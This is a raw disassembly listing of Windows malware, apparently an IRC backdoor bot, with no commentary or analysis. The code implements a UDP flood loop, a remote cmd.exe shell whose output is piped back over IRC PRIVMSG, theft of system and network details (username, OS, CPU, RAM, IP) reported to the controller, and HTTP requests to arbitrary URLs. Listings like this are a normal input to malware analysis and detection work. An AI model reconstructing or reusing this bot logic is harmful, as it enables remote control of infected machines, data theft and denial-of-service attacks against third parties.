loc_40A39D: ; CODE XREF: sub_40A2BF+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_40A3A7
; ---------------------------------------------------------------------------
loc_40A3A4: ; CODE XREF: sub_40A2BF+6E�j
lea eax, [ebp+arg_0]
loc_40A3A7: ; CODE XREF: sub_40A2BF+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_40A3C2
call sub_415372
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40A3C5
; ---------------------------------------------------------------------------
loc_40A3C2: ; CODE XREF: sub_40A2BF+F0�j
push [ebp+var_24]
loc_40A3C5: ; CODE XREF: sub_40A2BF+101�j
call dword_43CA24 ; ntohs
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_40A3D7
mov [ebp+var_24], esi
loc_40A3D7: ; CODE XREF: sub_40A2BF+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_40A3E4
mov [ebp+var_24], eax
loc_40A3E4: ; CODE XREF: sub_40A2BF+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_40A3F8
mov [ebp+var_28], esi
loc_40A3F8: ; CODE XREF: sub_40A2BF+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_40A471
loc_40A3FF: ; CODE XREF: sub_40A2BF+158�j
call sub_415372
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_40A3FF
jmp short loc_40A471
; ---------------------------------------------------------------------------
loc_40A41B: ; CODE XREF: sub_40A2BF+1B5�j
dec [ebp+var_30]
push 0Bh
pop esi
loc_40A421: ; CODE XREF: sub_40A2BF+192�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_415372
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_43CA88 ; sendto
push [ebp+var_28]
call dword_421060 ; Sleep
dec esi
jnz short loc_40A421
cmp [ebp+var_24], edi
jnz short loc_40A471
call sub_415372
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_43CA24 ; ntohs
mov [ebp+var_E], ax
loc_40A471: ; CODE XREF: sub_40A2BF+13E�j
; sub_40A2BF+15A�j ...
cmp [ebp+var_30], edi
jg short loc_40A41B
dec [ebp+var_30]
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset dword_42B578
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40A4B9
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_412BD1
add esp, 14h
loc_40A4B9: ; CODE XREF: sub_40A2BF+1D8�j
lea eax, [ebp+var_334]
push eax
call sub_40B078
push [ebp+var_20]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
sub_40A2BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A4D6 proc near ; CODE XREF: sub_40A506+2A�p
; sub_40A53E+7E�p ...
mov eax, dword_43CD64
push esi
mov esi, dword_42106C
cmp eax, 0FFFFFFFFh
jz short loc_40A4EA
push eax
call esi ; CloseHandle
loc_40A4EA: ; CODE XREF: sub_40A4D6+F�j
mov eax, dword_43CD6C
cmp eax, 0FFFFFFFFh
jz short loc_40A4F7
push eax
call esi ; CloseHandle
loc_40A4F7: ; CODE XREF: sub_40A4D6+1C�j
mov eax, dword_43CD60
cmp eax, 0FFFFFFFFh
jz short loc_40A504
push eax
call esi ; CloseHandle
loc_40A504: ; CODE XREF: sub_40A4D6+29�j
pop esi
retn
sub_40A4D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A506 proc near ; CODE XREF: sub_40B459+14A�p
; sub_40CD3A+446D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_415B10
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_43CD68
call dword_421070 ; WriteFile
test eax, eax
jnz short loc_40A539
call sub_40A4D6
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40A539: ; CODE XREF: sub_40A506+28�j
xor eax, eax
inc eax
leave
retn
sub_40A506 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A53E proc near ; CODE XREF: sub_40A5C5+D3�p
; sub_40A5C5+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_43B658
push [ebp+arg_4]
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40A581
push 7D0h
call dword_421060 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_415316
add esp, 10h
jmp short loc_40A598
; ---------------------------------------------------------------------------
loc_40A581: ; CODE XREF: sub_40A53E+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_1 ; "%s"
push eax
call sub_415316
add esp, 0Ch
loc_40A598: ; CODE XREF: sub_40A53E+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
test eax, eax
jg short loc_40A5C1
call sub_40A4D6
loc_40A5C1: ; CODE XREF: sub_40A53E+7C�j
xor eax, eax
leave
retn
sub_40A53E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5C5 proc near ; DATA XREF: sub_40A71A+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_43CD70
loc_40A5DD: ; CODE XREF: sub_40A5C5+79�j
; sub_40A5C5+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push dword_43CD64
call dword_421000 ; PeekNamedPipe
test eax, eax
jz loc_40A6AB
cmp [ebp+var_4], edi
jnz short loc_40A640
lea eax, [ebp+var_8]
push eax
push dword_43CD60
call dword_4210FC ; GetExitCodeProcess
test eax, eax
jz short loc_40A636
cmp [ebp+var_8], 103h
jnz loc_40A6CF
loc_40A636: ; CODE XREF: sub_40A5C5+62�j
push 0Ah
call dword_421060 ; Sleep
jmp short loc_40A5DD
; ---------------------------------------------------------------------------
loc_40A640: ; CODE XREF: sub_40A5C5+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40A657
loc_40A647: ; CODE XREF: sub_40A5C5+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_40A6A5
inc eax
cmp eax, [ebp+var_4]
jb short loc_40A647
loc_40A657: ; CODE XREF: sub_40A5C5+80�j
mov [ebp+var_4], esi
loc_40A65A: ; CODE XREF: sub_40A5C5+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_43CD64
call dword_421068 ; ReadFile
test eax, eax
jz short loc_40A6F7
lea eax, [ebp+var_20C]
push eax
push ebx
push dword_43CDA4
call sub_40A53E
add esp, 0Ch
jmp loc_40A5DD
; ---------------------------------------------------------------------------
loc_40A6A5: ; CODE XREF: sub_40A5C5+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_40A65A
; ---------------------------------------------------------------------------
loc_40A6AB: ; CODE XREF: sub_40A5C5+45�j
push offset dword_42B688
push ebx
push dword_43CDA4
call sub_40A53E
push [ebp+arg_0]
call sub_4150F0
add esp, 10h
push 1
call dword_421048 ; ExitThread
loc_40A6CF: ; CODE XREF: sub_40A5C5+6B�j
call sub_40A4D6
push offset dword_42B64C
push ebx
push dword_43CDA4
call sub_40A53E
push [ebp+arg_0]
call sub_4150F0
add esp, 10h
push edi
call dword_421048 ; ExitThread
loc_40A6F7: ; CODE XREF: sub_40A5C5+C3�j
push offset dword_42B608
push ebx
push dword_43CDA4
call sub_40A53E
push [ebp+arg_0]
call sub_4150F0
add esp, 10h
push edi
call dword_421048 ; ExitThread
sub_40A5C5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A71A proc near ; CODE XREF: sub_40B459+99�p
; sub_40CD3A+5167�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40A4D6
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_43CADC ; SearchPathA
test eax, eax
jz loc_40A814
lea eax, [ebp+var_1C]
mov edi, dword_421108
push esi
push eax
lea eax, [ebp+var_C]
xor ebx, ebx
push eax
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_40A814
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_40A814
mov edi, dword_421104
push 3
push esi
push esi
push offset dword_43CD68
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call dword_421100 ; DuplicateHandle
test eax, eax
jz short loc_40A814
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_415390
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_415390
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_43B658
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call dword_4210EC ; CreateProcessA
test eax, eax
jnz short loc_40A81C
loc_40A814: ; CODE XREF: sub_40A71A+2F�j
; sub_40A71A+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_40A8CA
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A71A+F8�j
push [ebp+var_4]
mov edi, dword_42106C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_43CD64, eax
mov eax, [ebp+var_8]
mov dword_43CD6C, eax
mov eax, [ebp+var_2C]
mov dword_43CD60, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_43CDA4, eax
jz short loc_40A856
push [ebp+arg_4]
jmp short loc_40A857
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A71A+135�j
push ebx
loc_40A857: ; CODE XREF: sub_40A71A+13A�j
push offset dword_43CD70
call sub_415316
pop ecx
pop ecx
push esi
push 7
push offset dword_42B718
call sub_414DDA
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_441BA0[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40A5C5
push esi
push esi
call dword_42108C ; CreateThread
cmp eax, esi
loc_40A899: ; DATA XREF: .text:00424F14�o
; .text:00424F58�o ...
mov dword_441BAC[edi], eax
jnz short loc_40A8C8
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset dword_42B6D0
push eax
call sub_415316
lea eax, [ebp+var_378]
push eax
call sub_40B078
add esp, 10h
loc_40A8C8: ; CODE XREF: sub_40A71A+185�j
xor eax, eax
loc_40A8CA: ; CODE XREF: sub_40A71A+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A71A endp
; =============== S U B R O U T I N E =======================================
sub_40A8CF proc near ; CODE XREF: sub_407075+74�p
; sub_40A9D8+217�p ...
arg_0 = dword ptr 4
push esi
push edi
call dword_42104C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
mov esi, offset dword_43CDA8
push 32h
push esi
call sub_41588A
add esp, 18h
mov eax, esi
pop edi
pop esi
retn
sub_40A8CF endp
; =============== S U B R O U T I N E =======================================
sub_40A922 proc near ; CODE XREF: sub_40A9D8+290�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_40A92A: ; CODE XREF: sub_40A922+2F�j
; sub_40A922+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call dword_421060 ; Sleep
rdtsc
sub eax, esi
push 0
sbb edx, ebx
push edi
push edx
push eax
call sub_417180
mov esi, edx
mov ebx, eax
test esi, esi
ja short loc_40A92A
jb short loc_40A959
cmp ebx, edi
ja short loc_40A92A
loc_40A959: ; CODE XREF: sub_40A922+31�j
push 0
push 64h
push esi
push ebx
call sub_417100
mov ecx, edx
push 64h
xor edx, edx
mov edi, eax
test ecx, ecx
pop eax
ja short loc_40A9CC
jb short loc_40A978
cmp edi, 50h
jnb short loc_40A97D
loc_40A978: ; CODE XREF: sub_40A922+4F�j
push 4Bh
xor edx, edx
pop eax
loc_40A97D: ; CODE XREF: sub_40A922+54�j
test ecx, ecx
ja short loc_40A9CC
jb short loc_40A988
cmp edi, 47h
jnb short loc_40A98D
loc_40A988: ; CODE XREF: sub_40A922+5F�j
push 42h
xor edx, edx
pop eax
loc_40A98D: ; CODE XREF: sub_40A922+64�j
test ecx, ecx
ja short loc_40A9CC
jb short loc_40A998
cmp edi, 37h
jnb short loc_40A99D
loc_40A998: ; CODE XREF: sub_40A922+6F�j
push 32h
xor edx, edx
pop eax
loc_40A99D: ; CODE XREF: sub_40A922+74�j
test ecx, ecx
ja short loc_40A9CC
jb short loc_40A9A8
cmp edi, 26h
jnb short loc_40A9AD
loc_40A9A8: ; CODE XREF: sub_40A922+7F�j
push 21h
xor edx, edx
pop eax
loc_40A9AD: ; CODE XREF: sub_40A922+84�j
test ecx, ecx
ja short loc_40A9CC
jb short loc_40A9B8
cmp edi, 1Eh
jnb short loc_40A9BD
loc_40A9B8: ; CODE XREF: sub_40A922+8F�j
push 19h
xor edx, edx
pop eax
loc_40A9BD: ; CODE XREF: sub_40A922+94�j
test ecx, ecx
ja short loc_40A9CC
jb short loc_40A9C8
cmp edi, 0Ah
jnb short loc_40A9CC
loc_40A9C8: ; CODE XREF: sub_40A922+9F�j
xor eax, eax
xor edx, edx
loc_40A9CC: ; CODE XREF: sub_40A922+4D�j
; sub_40A922+5D�j ...
sub eax, edi
pop edi
sbb edx, ecx
add eax, ebx
adc edx, esi
pop esi
pop ebx
retn
sub_40A922 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9D8 proc near ; CODE XREF: sub_40CD3A+53E3�p
var_968 = byte ptr -968h
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 968h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_43B658
mov [ebp+var_CC], 94h
call dword_42110C ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_40AA5F
cmp [ebp+var_C4], ebx
jnz short loc_40AA3B
cmp [ebp+var_BC], 1
jnz short loc_40AA25
mov [ebp+var_4], offset a95 ; "95"
loc_40AA25: ; CODE XREF: sub_40A9D8+44�j
cmp [ebp+var_BC], 2
jnz loc_40AADA
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_40AAAB
; ---------------------------------------------------------------------------
loc_40AA3B: ; CODE XREF: sub_40A9D8+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_40AA4D
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_40AAA2
; ---------------------------------------------------------------------------
loc_40AA4D: ; CODE XREF: sub_40A9D8+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_40AA9B
mov [ebp+var_4], offset aMe ; "ME"
jmp short loc_40AAA2
; ---------------------------------------------------------------------------
loc_40AA5F: ; CODE XREF: sub_40A9D8+33�j
cmp [ebp+var_C8], 5
jnz short loc_40AA9B
cmp [ebp+var_C4], ebx
jnz short loc_40AA79
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_40AAA2
; ---------------------------------------------------------------------------
loc_40AA79: ; CODE XREF: sub_40A9D8+96�j
cmp [ebp+var_C4], 1
jnz short loc_40AA8B
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_40AAA2
; ---------------------------------------------------------------------------
loc_40AA8B: ; CODE XREF: sub_40A9D8+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_40AAA2
loc_40AA9B: ; CODE XREF: sub_40A9D8+7C�j
; sub_40A9D8+8E�j
mov [ebp+var_4], offset dword_42B868
loc_40AAA2: ; CODE XREF: sub_40A9D8+73�j
; sub_40A9D8+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_40AADA
loc_40AAAB: ; CODE XREF: sub_40A9D8+61�j
cmp [ebp+var_B8], bl
jz short loc_40AADA
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset dword_42B860
push eax
call sub_415316
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_40AADA: ; CODE XREF: sub_40A9D8+54�j
; sub_40A9D8+D1�j ...
mov ax, word_42B85C
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_43C910
mov [ebp+var_8], 100h
cmp eax, ebx
jz short loc_40AB13
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_40AB13: ; CODE XREF: sub_40A9D8+12C�j
push [ebp+arg_4]
call sub_40A08A
pop ecx
push eax
call dword_43CA64 ; inet_addr
mov [ebp+var_C], eax
push 2
lea eax, [ebp+var_C]
push 4
push eax
call dword_43C9DC ; gethostbyaddr
cmp eax, ebx
jz short loc_40AB3C
push dword ptr [eax]
jmp short loc_40AB41
; ---------------------------------------------------------------------------
loc_40AB3C: ; CODE XREF: sub_40A9D8+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40AB41: ; CODE XREF: sub_40A9D8+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_415316
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call dword_421058 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call dword_421084 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_421080 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call dword_421110 ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_4171E8
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_968]
push eax
call sub_40C21C
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_40A8CF
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40C10D
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40C10D
pop ecx
pop ecx
push eax
call sub_40A922
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_41588A
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_40A9D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC8C proc near ; CODE XREF: sub_40CD3A+4388�p
; sub_40CD3A+5411�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_415390
add esp, 0Ch
cmp dword_43CB08, 0
jnz short loc_40AD00
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_43C8F4 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_40ACE1
lea eax, [ebp+var_8C]
push offset dword_42B8DC
push eax
call sub_415316
pop ecx
pop ecx
loc_40ACE1: ; CODE XREF: sub_40AC8C+40�j
test [ebp+var_C], 1
lea eax, [ebp+var_8]
jz short loc_40ACF9
push offset dword_42B8D4
loc_40ACEF: ; CODE XREF: sub_40AC8C+72�j
push eax
call sub_415316
pop ecx
pop ecx
jmp short loc_40AD1F
; ---------------------------------------------------------------------------
loc_40ACF9: ; CODE XREF: sub_40AC8C+5C�j
push offset dword_42B8D0
jmp short loc_40ACEF
; ---------------------------------------------------------------------------
loc_40AD00: ; CODE XREF: sub_40AC8C+28�j
mov esi, offset off_42B8CC
lea eax, [ebp+var_8]
push esi
push eax
call sub_415316
lea eax, [ebp+var_8C]
push esi
push eax
call sub_415316
add esp, 10h
loc_40AD1F: ; CODE XREF: sub_40AC8C+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_41588A
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_40AC8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD52 proc near ; DATA XREF: sub_40CD3A+459F�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
xor esi, esi
mov edi, 80h
inc esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_42BA28
call sub_415390
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_415390
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_415390
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_415390
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_415390
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call dword_43C92C ; InternetCrackUrlA
test eax, eax
jz loc_40AEF2
cmp [ebp+var_34], ebx
jbe short loc_40AE29
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_416BE0
add esp, 0Ch
loc_40AE29: ; CODE XREF: sub_40AD52+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_40AE47
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_416BE0
add esp, 0Ch
loc_40AE47: ; CODE XREF: sub_40AD52+DE�j
cmp [ebp+var_20], ebx
jbe short loc_40AE61
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_416BE0
add esp, 0Ch
loc_40AE61: ; CODE XREF: sub_40AD52+F8�j
cmp [ebp+var_18], ebx
jbe short loc_40AE7B
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_416BE0
add esp, 0Ch
loc_40AE7B: ; CODE XREF: sub_40AD52+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push dword_43C9D4
call dword_43C9F8 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_40AF08
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call dword_43C9EC ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40AF0F
push ebx
push ebx
push ebx
push ebx
push eax
call dword_43C9A0 ; HttpSendRequestA
test eax, eax
lea eax, [ebp+var_55C]
jz short loc_40AEEB
push offset dword_42B9F8
jmp short loc_40AF1A
; ---------------------------------------------------------------------------
loc_40AEEB: ; CODE XREF: sub_40AD52+190�j
push offset unk_42B9A8
jmp short loc_40AF1A
; ---------------------------------------------------------------------------
loc_40AEF2: ; CODE XREF: sub_40AD52+B7�j
lea eax, [ebp+var_55C]
push offset dword_42B974
push eax
call sub_415316
mov esi, [ebp+var_C]
jmp short loc_40AF20
; ---------------------------------------------------------------------------
loc_40AF08: ; CODE XREF: sub_40AD52+153�j
push offset unk_42B934
jmp short loc_40AF14
; ---------------------------------------------------------------------------
loc_40AF0F: ; CODE XREF: sub_40AD52+17B�j
push offset unk_42B8F0
loc_40AF14: ; CODE XREF: sub_40AD52+1BB�j
lea eax, [ebp+var_55C]
loc_40AF1A: ; CODE XREF: sub_40AD52+197�j
; sub_40AD52+19E�j
push eax
call sub_415316
loc_40AF20: ; CODE XREF: sub_40AD52+1B4�j
cmp [ebp+var_1D4], ebx
pop ecx
pop ecx
jnz short loc_40AF4D
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_412BD1
add esp, 14h
loc_40AF4D: ; CODE XREF: sub_40AD52+1D6�j
lea eax, [ebp+var_55C]
push eax
